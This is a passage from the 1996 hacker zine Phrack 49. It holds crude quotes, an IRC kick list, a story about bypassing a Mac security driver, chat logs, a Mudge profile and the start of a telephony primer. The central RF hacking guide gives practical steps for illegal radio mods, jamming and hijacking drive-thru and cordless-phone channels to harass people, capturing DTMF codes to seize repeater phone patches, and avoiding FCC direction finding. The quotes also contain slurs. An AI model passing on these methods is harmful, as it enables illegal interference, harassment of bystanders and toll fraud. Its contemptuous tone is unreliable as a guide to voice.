9. "My brain has a slow ping response"
- Kingpin
8. "Space Rogue, I've been coveting your pickle."
- espidre
7. "If there's space -n shit, then it's Star Trek. Unless there's that
little Yoda guy - then it's Star Wars"
- Kingpin
6. "I'm the editor of Phrack. Wanna lay down with me?"
- A very drunk unnamed editor of Phrack
5. "Let's go find that spic, b_, no offense"
- A drunk IP to b_.
4. "I'm lookin for that fat fucker Wozz. He's big, and got a green shirt,
and glasses, and curly hair, just like you. As a matta a fact, you
gots similar characteristics!"
- A drunk IP to wozz.
3. "He was passed out on the floor... so I pissed on him"
- An unknown assailant referring to IP
2. "It was the beginning and the end of my pimping career"
- Kingpin referring to his escapade of getting paid
two dollars for sex.
1. "French Toast Pleeeeze!"
- Everyone
----<>----
TOP 0x10 REASONS TO KICK && WAYS TO GET
KICKED OUT OF #HACK (Revision 0.1.1)
By SirLance
0x0f asking for any information about any Microsoft products
0x0e talking about cars, girls, or anything unrelated to hacking
0x0d flooding with a passwd file contents
0x0c asking how to unshadow passwd
0x0b being on #hack, #warez and #hotsex at the same time
0x0a asking for ops
0x09 using a nick including words like 'zero' 'cool' 'acid' or 'burn'
0x08 asking if someone wants to trade accounts, CCs or WaR3Z
0x07 asking what r00t means
0x06 asking when the latest Phrack will be released
0x05 asking where to get or how to create a BOT
0x04 having the word BOT anywhere in your nick
0x03 having a nick like Br0KnCaPs and SpEak LiK3 Th4t all the time
0x02 asking for flash.c or nuke.c, spoof.c, ipsniff.c or CrackerJack
0x01 thinking #hack is a helpdesk and ask a question
0x00 being on from AOL, Prodigy, CompuServe, or MSN
-EOL-
----<>----
International business
by HCF
Friday, 3:00am 4.12:
I get the call:
Julie: "You break into computers right...?"
Dover: "Yea, what kind..."
Julie: "Mac, I think."
Dover: "Hmm... Call ``HCF'' at 213.262-XXXX"
Julie: "Uh, will he be awake...?"
Dover: "Don't worry (snicker) he'll be awake."
Friday, 4:00am 4.12
HCF called me at 4am after he got the call from Julie:
HCF: "you got me into this mess, I need to barrow your car."
Dover: "Umm shure. Ok..."
HCF: "I'll be right over..."
Friday, 12:30pm 4.12: upon returning the car:
HCF: "Umm, got a parking ticket, I'll write you a check later..."
(I never got the check.)
Kathleen's comment to Julie which was passed to me (days later):
Kath: "Why didn't you tell me he was cute, I want him for myself!"
When I passed this on to HCF:
HCF: "She is *gorgeous* but not without a wet suit..."
Here is the story that happened early one Friday morning... The names
have been changed to protect the innocent, the guilty, and the innocent-looking
guilty....
I was reading up on a new firewall technology, the kind that locks
addresses out of select ports based on specific criterion, when the phone
rang.
"Hello?"
The voice of a women, between 18 and 30, somewhat deep like Kathleen
Turner's, said, "Uh, hello..."
There was an obvious pause. It seemed she was surprised that I was so
awake and answered sharply on the second ring. It was in the middle of my
working hours; 3:30 AM. There was no delay in the phone's response, no
subtle click after I picked up, and the audio quality was clear.
"Do you hack?" she asked.
Recorder on. Mental note: *stop* getting lazy with the recorder.
"No. Are you on a Cell phone?" I responded
"No."
"Are you using a portable battery operated telephone?"
"No. I was told by my friend ..."
"Are you in any way associated with local, federal or state law enforcement
agencies?"
"Oh, I get it. No I'm not. Julie said that you could help me."
I knew Julie through a mutual friend.
"Could you call me back in 5 minutes."
"Well, um, ok."
Throughout the whole conversation, the phones on her end were ringing off
the hook. As soon as I hung up, Ben, the mutual friend, called. Julie had
called him first, and he gave her my number. I got his reassurance that
this was legit. Ben was snickering but wouldn't divulge what it was about.
By now my curiosity was piqued.
The phone rang again, "I need someone who can break into a computer."
"Whose computer?"
"Mine."
It turns out that the woman had hostility bought out the previous owner of
this business. The computer in question had both a mission-critical
database of some sort and a multi-level security software installed. She
had been working under a medium permission user for some time. The
computer crashed in such a way as to require the master password (root) in
order to boot. The pervious owner moved out of town, could not be
contacted, and was most likely enjoying the situation thoroughly. The
woman was unaware of any of the technical specifications or configuration
of the machine. I was able to find out that it was a Apple Macintosh Color
Classic; a machine primarily distributed in Japan. It would be around
10:00 AM in Tokyo.
"Why are the phones ringing so often at this time of the morning?" I asked.
"I do a lot of international business."
I was intrigued, the answer was smoothly executed without a delay or pitch
change. I took the job.
Upon arriving, I was greeted by a young, stunningly beautiful, woman with
long, jet-black hair and stressed but clear green eyes. I checked the room
for obvious bugs and any other surveillance. There were calendars on the
wall, filled out with trixy and ultra-masculine sounding names like Candy
and Chuck. The phones had died down some. The machine in question was
obviously well integrated into the environment; dust patterns, scratch
marks, worn-out mouse pad; it had been there for some time. There was a
PBX, around 6 to 8 voice lines, three phones, and no network, modem or
outside connectivity.
The security, which we'll call VileGuard, defeated all the "simple" methods
of by-passing. None of the standard or available passwords, in any case or
combination, worked. A brute-force script would be slow as second failure
shut the machine down.
I made a SCSI sector copy onto a spare drive and replaced it with the
original. This involved tearing open the machine, pulling various parts
out, hooking up loose wires, merging several computers, and turning things
on in this state. Trivial and routine, I did it rapidly and with both
hands operating independently. For those who have never opened the case of
an all-in-one Mac, it involves a rather violent looking smack on both sides
of the pressure fitted case backing, appropriately called "cracking the
case." This did not serve well to calm the nerves of the client. After a
few moments of pallor and little chirps of horror, she excused herself from
the room.
While the SCSI copy preceded, I overheard her taking a few calls in the
other room. What I heard was a one-sided conversation, but I could pretty
much fill in the blanks,
"Hello, Exclusive Escorts, may I help you?"
"Would you like to be visited at your home or at a hotel?"
"Well, we have Suzy, she's a 5'4" Asian lady with a very athletic body.
Very shy but willing, and very sensual, she measures 34, 24, 34."
"Big what? Sir, you'll have to speak a little clearer."
"Oh, I see, well we have a very well endowed girl named Valerie, she's a
double D and measures 38, 24, 34. Would that be more to your liking?"
It was not easy to keep from busting up laughing.
"He wants you to do what? Well, charge him double."
With the new drive installed, and to predictable results, I fired up a hex
editor. My experience has been that full-disk encryption typically slows
the machine down to the point where the user disables it. At around
$5C9E8, I found, "...507269 6E74204D 616E6167 65722045 72726F72...
...Print Manager Error..." in plain text. I searched for some of the
known, lower permission, passwords. I found a few scattered around sector
$9b4. The hex editor I was using could not access the boot or driver
partitions, so I switched to one that could. It's not as pretty of an
interface as the last editor, and is rather old. Its saving grace though
is that it doesn't recognize the modern warnings of what it can and cannot
see. There it was, VileGuard; driver level security.
"Eric is endowed with eight and has a very masculine physique."
Every male was "endowed with eight," every female had relatively identical
measurements.
I hunted fruitlessly around the low sectors for what might be the master
password. All awhile wishing the find function of the editor would accept
regexp. All the other passwords were intercapped on the odd character, but
that was a convention of the current owner, and not necessarily used by the
past owner.
"Oh, you want a girl that is fluent in Greek?"
It's not professional for me, and not good salesmanship for her, to have me
overheard laughing myself into anoxia. After trying to straighten up and
gather my wits together again, I began to consider an alternate
possibility. If I don't know the password, what happens if I make it so
that the driver doesn't either. Return to the first-installed condition
perhaps? It was a thought. It turned out to be a bad thought, resulting in
my haphazardly writing "xxxx" over, pretty much, random sectors of the
driver partition.
"Oh yes sir, Roxanne prefers older men. She appreciates how very
experienced they are. I understand sir, and I'm sure she can help you with
that."
Before I made a second copy and whipped out the RE tools, TMON and MacNosy,
I tried booting. The results were, as you'd expect, that the disk didn't
mount. Instead, it asked me if I wanted to reinitialize the disk. Pause.
Think... ya, why not. This was most definitely farther than I had gotten
with the secure driver installed and functional. I canceled and fired up
one of many disk formatters I had on hand. Though the formatter wasn't the
slickest, it had proven itself repeatedly in the past. Its main quality
was that of writing a driver onto a disk that is in just about *any*
condition. It's made by a French drive manufacturer. As dangerous as this
behavior is, I'm sure it's a planned feature. It could see the drive and
allowed me to "update" the driver. A few seconds later, a normal
"finished" dialog.
"Yes, Stan carries a set of various toys with him. No, I don't believe he
normally carries that, but I'm sure if you ask him nicely, he'll drop by
the hardware store on his way and pick one up."
I rebooted. It worked. I copied over the disk's data and reformatted.
Time to try it on the original drive (I had, of course, been working on my
copy.) Upon startup, before anything could be accessed, "Please input the
master password..."
Puts an unusual twist on the phrase, "adverse working conditions"
- HCF
Note 1: Payment was in currency.
Note 2: If you ever think you understand the opposite sex's view on sex,
you're underestimating.
----<>----
The Beginners Guide to RF hacking
by Ph0n-E of BLA & DOC
Airphones suck. I'm on yet another long plane ride to some
wacky event. I've tried dialing into my favorite isp using this lame GTE
airphone, $15 per call no matter how long you "talk". In big letters it
says 14.4k data rate, only after several attempts I see the very fine
print, 2400 baud throughput. What kind of crap is that? A 14.4 modem that
can only do 2400? It might be the fact they use antiquated 900MHz AM
transmissions. The ATT skyphones that are now appearing use imarsat
technology, but those are $10/minute. Anyway they suck, and I have an
hour or so before they start showing Mission Impossible so I guess I'll
write this Phrack article Route has been bugging me about.
There are a bunch of people who I've helped get into radio stuff, five
people bought handheld radios @ DefCon... So I'm going to run down some
basics to help everyone get started. As a disclaimer, I knew nothing about
RF and radios two years ago. My background is filmmaking, RF stuff is just
for phun.
So why the hell would you want to screw around with radio gear? Isn't it
only for old geezers and wanna be rentacops? Didn't CB go out with Smokey
& the Bandit?
Some cool things you can do:
Fast-food drive thrus can be very entertaining, usually the order taker
is on one frequency and the drivethru speaker is on another. So you can
park down the block and tell that fat pig that she exceeds the weight
limit and McDonalds no longer serves to Fatchix. Or when granny pulls up
to order those tasty mcnuggets, blast over her and tell the nice MCD slave
you want 30 happy meals for your trip to the orphanage. If you're lucky
enough to have two fast food palaces close to each other you can link them
together and sit back and enjoy the confusion.
You've always wanted a HERF gun, well your radio doubles as a small
scale version. RF energy does strange and unpredictable things to
electronic gear, especially computers. The guy in front of me on the plane
was playing some lame game on his windowz laptop which was making some very
annoying cutey noises. He refused to wear headphones, he said "they mushed
his hair...". Somehow my radio accidentally keyed up directly under his
seat, there was this agonizing cutey death noise and then all kinds of cool
graphics appeared on his screen, major crash. He's still trying to get it
to reboot.
Of course there are the ever popular cordless phones. The new ones work
on 900MHz, but 90% of the phones out there work in the 49MHz band. You can
easily modify the right ham radio or just use a commercial low band radio
to annoy everyone. Scanning phone calls is OK, but now you can talk back,
add sound effects, etc... That hot babe down the street is talking to
her big goony boyfriend, it seems only fair that you should let her know
about his gay boyfriend. Endless hours of torture.
You can also just rap with your other hacker pals (especially useful
cons). Packet radio, which allows you up to 9600 baud wireless net
connections, its really endless in its utility.
How to get started:
Well you're supposed to get this thing called a HAM license. You take
this test given by some grampa, and then you get your very own call sign.
If you're up to that, go for it. One thing though, use a P.O. box for your
address as the feds think of HAMs as wackos, and are first on the list when
searching for terrorists. Keep in mind that most fun radio things are
blatantly illegal anyway, but you're use to that sort of thing, right?
If you are familiar with scanners, newer ones can receive over a very
large range of frequencies, some range from 0 to 2.6 GHz. You are not going
to be able to buy a radio that will transmit over that entire spectrum. There
are military radios that are designed to sweep large frequencies ranges for
jamming, bomb detonation, etc. - but you won't find one at your local radio
shack.
A very primitive look at how the spectrum is broken down into sections:
0 - 30MHz (HF) Mostly HAM stuff, short-wave, CB.
30 - 80MHz (lowband) Police, business, cordless phones, HAM
80 - 108MHz (FM radio) You know, like tunes and stuff
110 - 122MHz (Aircraft band) You are clear for landing on runway 2600
136 - 174MHz (VHF) HAM, business, police
200 - 230MHz Marine, HAM
410 - 470MHz (UHF), HAM, business
470 - 512MHz T-band, business, police
800MHz cell, trunking, business
900MHz trunking, spread spectrum devices, pagers
1GHZ+ (microwave) satellite, TV trucks, datalinks
Something to remember, the lower the frequency the farther the radio waves
travel, and the higher the frequency the more directional the waves are.
A good place to start is with a dual band handheld. Acquire a Yaesu
FT-50. This radio is pretty amazing, its very small, black and looks cool.
More importantly it can easily be moded. You see this is a HAM radio, it's
designed to transmit on HAM bands, but by removing a resistor and solder
joint, and then doing a little keypad trick you have a radio that transmits
all over the VHF/UHF bands. It can transmit approximately 120-232MHz and
315-509MHz (varies from radio to radio), and will receive from 76MHz to about
1GHz (thats 1000MHz lamer!), and yes that *includes* cell phones. You also
want to get the FTT-12 keypad which adds PL capabilities and other cool stuff
including audio sampling. So you get a killer radio, scanner, and red box all
in one! Yaesu recently got some heat for this radio so they changed the eprom
on newer radios, but they can modified as well, so no worries.
Now for some radio basics. There are several different modulation schemes,
SSB - Single Side Band, AM - Amplitude Modulation, FM - Frequency Modulation,
etc. The most common type above HF communications is NFM, or Narrow band
Frequency Modulation.
There are three basic ways communication works:
Simplex - The Transmit and Receive frequencies are the same, used for short
distance communications.
Repeater - The Transmit and Receive frequencies are offset, or even on
different bands.
Trunking - A bunch of different companies or groups within a company share
multiple repeaters. If you're listening to a frequency with a scanner and
one time its your local Police and the next it's your garbage man, the fire
dept... - that's trunking. Similar to cell phones you get bits and pieces
of conversations as calls are handed off among repeater sites.
Their radios are programmed for specific "talk groups", so the police only
hear police, and not bruno calling into base about some weasel kid he found
rummaging through his dumpsters. There are three manufacturers - Motorola,
Ericsson (GE), and EF Johnson. EFJ uses LTR which sends sub-audible codes
along with each transmission, the other systems use a dedicated control
channel system similar to cell phones. Hacking trunk systems is an entire
article in itself, but as should be obvious, take out the control channel
and the entire system crashes (in most cases).
OK so you got your new radio you tune around and your find some security
goons at the movie theater down the street. They are total losers so you
start busting on them. You can hear them, but why they can't hear you?
The answer-- SubAudible Tones. These are tones that are constantly
transmitted with your voice transmission - supposedly subaudible, but if
you listen closely you can hear them. With out the tone you don't break
their squelch (they don't hear you.) These tones are used keep nearby
users from interfering with each other and to keep bozos like you from
messing with them. There are two types, CTCSS Continuos Tone-Codes Squelch
system (otherwise known as PL or Privacy Line by Motorola) or DCS Digital
Coded Squelch (DPL - Digital Privacy Line). If you listened to me and got
that FT-50 you will be styling because its the only modable dual band that
does both. So now you need to find their code, first try PL because its
more common. There is a mode in which the radio will scan for tones for
you, but its slow and a pain. The easiest thing to do is turn on Tone
Squelch, you will see the busy light on your radio turn on when they are
talking but you wont hear them. Go into the PL tone select mode and tune
through the different tones while the busy light remains on, as soon as you
hear them again you have the right tone, set it and bust away! If you
don't find a PL that works move on to DPL. There is one other squelch
setting which uses DTMF tone bursts to open the squelch, but its rarely
used, and when it is used its mostly for paging and individuals.
Now you find yourself at Defcon, you hear DT is being harassed by
security for taking out some slot machines with a HERF gun, so you figure
it's your hacker responsibility to fight back. You manage to find a
security freq, you get their PL, but their signal is very weak, and only
some of them can hear your vicious jokes about their moms. What's up? They
are using a repeater. A handheld radio only puts out so much power,
usually the max is about 5 watts. That's pretty much all you want radiating
that close to your skull (think brain tumor). So a repeater is radio that
receives the transmissions from the handhelds on freq A and then
retransmits it with a ton more watts on freq B. So you need to program
your radio to receive on one channel and transmit on another. Usually
repeaters follow a standard rule of 5.0MHz on UHF and .6MHz on VHF, and
they can either be positive or negative offsets. Most radios have a
auto-repeater mode which will automatically do the offset for you or you
need to place the TX and RX freqs in the two different VCOs. Government
organizations and people who are likely targets for hacks (Shadow Traffic
news copter live feeds) use nonstandard offsets so you will just need to
tune around.
Some ham radios have an interesting feature called crossband repeat.
You're hanging out at Taco Bell munching your Nachos Supreme listening to the
drive thru freq on your radio. You notice the Jack in the Box across the
street, tuning around you discover that TacoHell is on VHF (say 156.40) and
Jack in the Crack is on UHF (say 464.40). You program the two freqs into
your radio and put it in xband repeat mode. Now when someone places their
order at Taco they hear it at Jacks, and when they place their order at
Jacks they hear it at Taco. When the radio receives something on 156.40 it
retransmits it on 464.40, and when it receives something on 464.40 it
retransmits it on 156.40.
"...I want Nachos, gimme Nachos..."
"...Sorry we don't have Nachos at Jack's..."
"...Huh? Im at Taco Bell..."
Get it? Unfortunately the FT-50 does not do xband repeat, that's the only
feature it's lacking.
Damn it, all this RF hacking is fun, but how do I make free phone calls?
Well you can, sort of. Many commercial and amateur repeaters have a
feature called an autopatch or phonepatch. This is a box that connects the
radio system to a phone line so that you can place and receive calls. Keep
in mind that calls are heard by everyone who has their radio on! The
autopatch feature is usually protected by a DTMF code. Monitor the input
freq of the repeater when someone places a call you will hear their dtmf
digits - if you're super elite you can tell what they are by just hearing
them, but us normal people who have lives put the FT-50 in DTMF decode mode
and snag the codez... If your radio doesn't do DTMF decode, record the audio
and decode it later with your soundblaster warez. Most of the time they
will block long-distance calls, and 911 calls. Usually there is a way
around that, but this is not a phreaking article. Often the repeaters are
remote configurable, the operator can change various functions in the field
by using a DTMF code. Again, scan for that code and you too can take
control of the repeater. What you can do varies greatly from machine to
machine, sometimes you can turn on long-distance calls, program speed-dials,
even change the freq of the repeater.
What about cordless phones, can't I just dial out on someone's line?
Sort of. You use to be able to take a Sony cordless phone which did
autoscanning (looked for an available channel) drive down the block with
the phone on until it locked on to your neighbors cordless and you get a
dialtone. Now cordless phones have a subaudible security tone just like PL
tones on radios so it doesn't work anymore. There are a bunch of tones and
they vary by phone manufacturer, so it's easier to make your free calls other
ways.
But as I mentioned before you can screw with people, not with your FT-50
though. Cordless phones fall very close to the 6 meter (50MHz) HAM band and
the lowband commercial radio frequencies. There are 25 channels with the
base transmitting 43-47MHz and the handset from 48-50MHz. What you want to
do is program a radio to receive on the base freqs and transmit on the
handset freqs. The phones put out a few milliwatts of power (very little).
On this freq you need a fairly big antenna, handhelds just don't cut it -
think magmount and mobile. There are HAM radios like the Kenwood TM-742A
which can be modified for the cordless band, however I have not found a
radio which works really well receiving the very low power signals the
phones are putting out. So, I say go commercial! The Motorola
Radius/Maxtrac line is a good choice. They have 32 channels and put out
a cool 65watts so your audio comes blasting out of their phones. Now
the sucko part, commercial radios are not designed to be field
programmable. There are numerous reasons for this, mainly they just want
Joe rentalcop to know he is on "Channel A" , not 464.500. Some radios are
programmed vie eproms, but modern Motorola radios are programmed via a
computer. You can become pals with some guy at your local radio shop and
have him program it for you. If you want to do it yourself you will need
a RIB (Radio Interface Box) with the appropriate cable for the radio, and
some software. Cloned RIB boxes are sold all the time in rec.radio.swap
and at HAM swap meets. The software is a little more difficult, Motorola
is very active in going after people who sell or distribute thier software
(eh, M0t?) They want you to lease it from them for a few zillion dollars.
Be cautious, but you can sometimes find mot warez on web sites, or at HAM
shows. The RIB is the same for most radios, just different software, you
want Radius or MaxTrac LabTools. It has built in help, so you should be
able to figure it out. Ok so you got your lowband radio, snag a 6 meter
mag mount antenna, preferably with gain, and start driving around. Put
the radio in scan mode and you will find and endless amount of phone calls
to break into. Get a DTMF mic for extra fun, as your scanning around listen
for people just picking up the phone to make a call. You'll hear dialtone,
if you start dialing first since you have infinitely more power than the
cordless handset you will overpower them and your call will go through.
It's great listening to them explain to the 411 operator that their phone is
possessed by demons who keep dialing 411. Another trick is to monitor the
base frequency and listen for a weird digital ringing sound - these are tones
that make the handset ring. Sample these with a laptop or a yakbak or
whatever and play them back on the BASE frequency (note, not the normal
handset freq) and you will make their phones ring. Usually the sample won't
be perfect so it will ring all wacko. Keep in mind this tone varies from
phone to phone, so what works on one phone wont work on another.
Besides just scanning around how do you find freqs? OptoElectronics
makes cool gizmos called near-field monitors. They sample the RF noise
floor and when they see spikes above that they lock on to them. So you
stick the Scout in your pocket, when someone transmits near you, the scout
reads out their frequency. The Explorer is thier more advanced model which
will also demodulates the audio and decode PL/DPL/DTMF tones. There are
also several companies that offer CDs of the FCC database. You can search
by freq, company name, location, etc. Pretty handy if your looking for a
particular freq. Percon has cool CDs that will also do mapping. Before
you buy anything check the scanware web site, they are now giving away
their freq databases for major areas.
OK radioboy, you're hacking repeaters, you're causing all the cordless
phones in your neighborhood to ring at midnight, and no one can place
orders at your local drivethrus. Until one day, when the FCC and FBI
bust down your door. How do you avoid that?? OK, first of all don't
hack from home. Inspired people can eventually track you down. How?
Direction Finding and RF Fingerprinting. DF gear is basically a
wideband antenna and a specialized receiver gizmo to measure signal
strength and direction. More advanced units connect into GPS units for
precise positioning and into laptops for plotting locations and advance
analysis functions such as multipath negations (canceling out reflected
signals.) RF finger printing is the idea that each individual radio has
specific characteristics based on subtle defects in the manufacture of the
VCO and AMP sections in the radio. You sample a waveform of the radio and
now theoretically you can tell it apart from other radios. Doesn't really
work though-- too many variables. Temperature, battery voltage, age,
weather conditions and many other factors all effect the waveform.
Theoretically you could have a computer scanning around looking for a
particular radio, it might work on some days. Be aware that fingerprinting
is out there, but I wouldn't worry about it *too* much. On the other hand
DF gear in knowledgeable hands does work. Piss off the right bunch of HAMS
and they will be more than happy to hop in their Winnebego and drive all
over town looking for you. If you don't stay in the same spot or if you're
in an area with a bunch of metal surfaces (reflections) it can be very very
hard to find you. Hack wisely, although the FCC has had major cutbacks
there are certain instances in which they will take immediate action. They
are not going to come after you for encouraging Burger King patrons to become
vegetarians, but if you decide to become an air-traffic controller for a day
expect every federal agency you know of (and some you don't) to come looking
for your ass.
My plane is landing so thats all for now, next time - advanced RF hacking,
mobile data terminals, van eck, encryption, etc.
EOF
----<>----
10.16.96
Log from RAgent
GrimReper: I work For Phrack
GrimReper: Yeah
GrimReper: I gotta submit unix text things like every month
GrimReper: I've been in Phrack for a long time
GrimReper: Phrack is in MASS
-> *grimreper* so how much does Phrack pay you?
*GrimReper** How much?
*GrimReper** Hmm......
*GrimReper** About $142
-> *grimreper* really
-> *grimreper* who paid you?
*GrimReper** w0rd
*GrimReper** CardShoot
*GrimReper** Cardsh00t
-> *grimreper* hmm, I don't see any "cardsh00t" in the credits for phrack
+48
*GrimReper** There is
-> *grimreper* you might as well stop lying before I bring in daemon9,
+he's another friend of mine
-> *grimreper* he's one of the editors of phrack
*GrimReper** Get the latest Phrack?
*GrimReper** Its gonna have my NN
*GrimReper** watch
-> *grimreper* not anymore
*GrimReper** Go Ahead
-> *grimreper* actually
*GrimReper** so?
-> *grimreper* you will be mentioned
-> *grimreper* you'll be known as the lying fuckhead you are, when this
+log goes in the next issue
----<>----
10.24.96
Log from Aleph1
*** ggom is ~user01@pm1-6.tab.com (ggom)
*** on irc via server piglet.cc.utexas.edu ([128.83.42.61] We are now all
piglet)
*ggom* i am assembling a "tool shed". A "shed" for certain "expert" activity.
Can you help?
-> *ggom* maybe... go on
*ggom* i represent certain parties that are looking for corporate information.
this would fall under the "corporate espionage" umbrella
*ggom* this information could probably be obtained via phone phreak but access to
corporate servers would be a plus...can you help?
-> *ggom* a) how do I know you are not a cop/fed? b) why did you come to #hack
to ask for this? b) what type of data you after? c) what type of money are
you talking about?
*ggom* where else should i go to ask for this stuff????????
-> *ggom* you tell me. How do you know about #hack?
*ggom* looked it up on the irc server...figured this was a good place to
start........... i am talking about 4 to 5 figures here for the information
-> *ggom* you are also talking 4 to 5 years
-> *ggom* #hack is visited regularly by undercovers and the channel is logged
-> *ggom* talking openly about such thing is not smart
*ggom* whatever........... man, if you are GOOD, you are UNTRACEABLE. i
guess i am looking in the wrong place......
-> *ggom* you been watching way to many times "Hackers" and yes #hack is the
wrong place...
*ggom* we are on a private channel.........suggest a more private setting....
-> *ggom* sorry you started off on a bad foot. If you got a million to spare
for such information you would also have the resources to find the
appropiate person to do the job. So you either are full off it, are a fed,
or just plain dumb. This conversation ends here.
*ggom* later
*ggom* not talking a million.. talking 5 to 6 figures......... you are
right
*ggom* talk to me.......
*ggom* talk to me.......
----<>----
.oO Phrack 49 Oo.
Volume Seven, Issue Forty-Nine
4 of 16
-:[ Phrack Pro-Phile ]:-
We discussed for a long time who in the hacking world today best
exemplifies everything that is right with hacking today, and we came
up with a unanimous conclusion that it was Mudge. And so we were quite
happy that our first choice for the first pro-phile that we have done
accepted our invitation. He cracked your Apple warez when you couldn't,
he wrote buffer overflows before they were cool, he owned your Sendmail
(and probably still does), and he still manages to give more back to the
community than anyone else around. We can't say much more about him so
let's see what he has to say for himself...
Mudge
~~~~~
Personal
~~~~~~~~
Handle: mudge
Call him: Enough people know it that its not secret, if you know
it great, if not you probably don't have to.
Past handles: Many old Apple ][ crackers remember me by a different
handle. That handle is long put to rest thanks to the
government.
Handle origin: Mudge is a very common Irish last name. Though I'm not
Irish I met someone with the name and couldn't believe
it was a proper name. Out of homage to this person I
took it as a handle several years ago (and since I
couldn't use the old one for legal reasons).
Date of Birth: Mid to Late '60s
Age at current date: Mid to Late 20s
Height: 6'0"
Weight: 150
Eye color: Blue
Hair Color: Brownish / dirty blonde and loooong
Computer: MPP Risc machine with 16 processors, 4 processor i860
Cadmus, 2 Sparcs, my original Apple ][+, NeXT cube,
486, 4 Sun 3's, Textronix 4051, SouthWest Technical
Products 75
Sysop/Co-Sysop of: Cell-Block, Magic Tavern, Co-Sysop on the old Circus
and Circus-II boards, ATDT, Works, and various AEs
scattered across the country. And a little place
called the l0pht.
Boards Frequented: Terrapin Station, Metal Shop, Black Crawling Systems,
Used to hang on Rutgers' with the old Darpa people
(they know who they are) through telenet.
Net address: mudge@l0pht.com
Favorite Things
~~~~~~~~~~~~~~~
Women: Not a big womanizer, when I hook up with someone it's usually
for quite some time. Though it's always nice when big companies
try to bribe you other ways. (Moreso 'cause it shows how sleazy
the big companies are in comparison to human beings :>)
Cars: Ford GT40, Porsche Wolf, Ferrari 318's, and of course a black
SVT Cobra with black leather interior.
Foods: Beer
Beers: Mateen Triple - with a runner up of Pilsner Urquell
Music: Frank Zappa, Dream Theater, Rush, Gentle Giant, King Crimson
Instruments: Guitar. I actually hold advanced degrees in music (hehe had
to make some money so here I am back in the 'puter world).
Guitars: Ibanez 7 string, Gibson es225 Jazzer, and a custom built Ibanez
from an endorsement deal (which is signed by 2 porn stars)
Books: Jack of Shadows, Roadmarks, Stranger in a Strange Land,
This Immortal, Steal this Urine Test, Steal this Book, PANIC -
the wonderful Sparc buffer overflow writers bible.
Turn Ons: Pet Rocks
Turn Offs: 7/11 employees who think they can dance to Frank Zappa
Other Passions, Interests, Loves:
I love running the l0pht and the people that are involved in it. There's
nothing like knowing that you are, at least attempting, to keep information
flowing and offering back to the community. I love a lot of things. It's
nice to see there is a sense of humor in the scene, and that there are still
enough old-school hackers that are willing to help if approached correctly
Granted there aren't enough of the older ones to answer every aol.com
e-mail... It's a great feeling to be beneficial to both sides. For instance:
when the 8.7.5 sploit went out and when we were doing a lot of work on SecureID
(which much to their schagrin we got *really* far) that both the people writing
the software and the hackers were happy to see our results. It's all about
information and learning. If you stop learning... you're not doing it right.
Unfortunately... it usually takes disseminating sploits to get some of the
large companies to fix their buggy software.
Most Memorable Experiences
~~~~~~~~~~~~~~~~~~~~~~~~~~
Having a bunch of suits get out of, yes, K-cars and take away most of my
belongings - learning 6502 (and living it) assembler - writing my first
buffer overflow a few years back - the band cutting it's first audio CD -
playing the music for one of Hobbit's laser shows - having Wietse Venema
ask me "not" to break into bell labs at a talk he was giving - having the
bellcore author of the OTP RFC write me e-mail realizing that I had beaten
him to the punch with vulnerabilities - everyday that I spend with my
girlfriend - hearing one of the songs I wrote and played on being played
on the radio - The L0pht and it's people - everytime that you finish working
on a new project and it actually works [especially when you are working on
a hypothetical exploit and it pans out].
Some People to Mention
~~~~~~~~~~~~~~~~~~~~~~
Cheshire Catalyst for the initial inspiration. The L0pht folks, Raven,
Hobbit for being a flat out brilliant fucker, ReDragon (best sense of humor -
and best patience... look who he works for ;-)), Glyph - one nasty coder,
Squarewave for providing countless hours of ooh's and aahhh's while
pouring through his code. The NewHack folks. G-heap, Pope, SpaceRogue,
Kingpin, Tan, Weld, Stefan, Brian Oblivion, t-com, all the standard
people that hang out and have a good time at the cons with the l0pht folks
(ie the r00t, NHC, l0ck/anti l0ck, cDc...) shit ALL the cDc folks. etc.,
etc. etc. The ASR guys. There are so many people that have contributed so
much. I'm sure I've left out many.
The biggest one: my father [the only person who could sit there and grin
through all of it... and explain the leafing procedures and how the 6502
REALLY worked] (that's not leafing through on the Apple ][+... two
separate things).
A few things you would like to say:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
French Toast please...
31337 is not a strong XOR key...
(unless your secret host key is less than 5 characters long)
Thanks to the new phrack lineup for keeping a good thing going.
Still remember DL'ing the latest ones along with the Countlegger series
and having to Dalton's Disk Disintegrator them back together.
Oh yeah...
and if someone tells you something is secure...
ask them to prove it, and then STILL don't believe them.
~~~~~~~~~~~~~~~~~~~~~
One last thing, in your personal experience, have you found that most
people in the scene are pretty much computer geeks?
"Absolutely not. I've had the privilege to hang out with everyone from
Weitse Venema, Dan Farmer, Casper Dik, Peter Guttman, to the hacker scene
like Hobbit, Daemon9, the l0pht folks... and there's very few out of the
bunch that I would label 'computer geeks'. Computer geeks seem not to have
that creative twist in many cases that hackers have. This is the same twist
that says: I don't care what it's _supposed_ to do - I bet I can make it do
*this*."
Thanks a lot for the prophile.
"Thanks a lot for the opportunity."
.oO Phrack 49 Oo.
Volume Seven, Issue Forty-Nine
File 05 of 16
Introduction to Telephony and PBX
by Cavalier[TNO]
Table of Contents
1. . . . . . . . . . . . . . . . . . . . The Central Office
2. . . . . . . . . . . . . . .Private Branch Exchange (PBX)
3. . . . . . . . . Properties of Analog and Digital Signals
4. . . . . . . . . . . . . . . . .Analog-Digital Conversion
5. . . . . . . . . . . . . . . . . . . Digital Transmission
6. . . . . . . . . . . . . . . . . . . . . . . Multiplexing
7. . . . . . . . . . . . . . . . . . . . Transmission Media
8. . . . . . . . . . . . . . . . . . . . . . . . .Signaling
.--------------------.
1 | The Central Office |
`--------------------'
Telephones alone do nothing special. Their connection to the rest of
world makes them one of mankind's greatest achievements.
In the early days of telephone communications, users had to establish
their own connections to other telephones. They literally had to string
their own telephone lines.
Although the customer inconvenience of building their own connections
limited the availability of phone service, an even greater problem soon
arose. As the telephone became more popular, more people wanted to be
connected. At the time, each phone had to be directly wired to each
other. In a very short time there was a disorganized maze of wires
running from the homes and businesses.
A simple mathematical formula demonstrates the growth in the number of
connections required in a directly wired network:
I = N(N-1)/2
(I = number of interconnections; N = number of subscribers)
I = 100(100-1)/2
If just 100 subscribers attempted to connect to each other, 4950
separate wire connections would be needed! Obviously, a better method
was needed.
Switching
A Central Office (CO) switch is a device that interconnects user
circuits in a local area, such as a town. The CO is a building where
all subscriber phone lines are brought together and provided with a
means of interconnection. If someone wants to call a neighbor, the call
is routed through the CO and switched to the neighbor.
What if someone wanted to call a friend in the next town? If their
friend was connected to a different CO, there was no way to communicate.
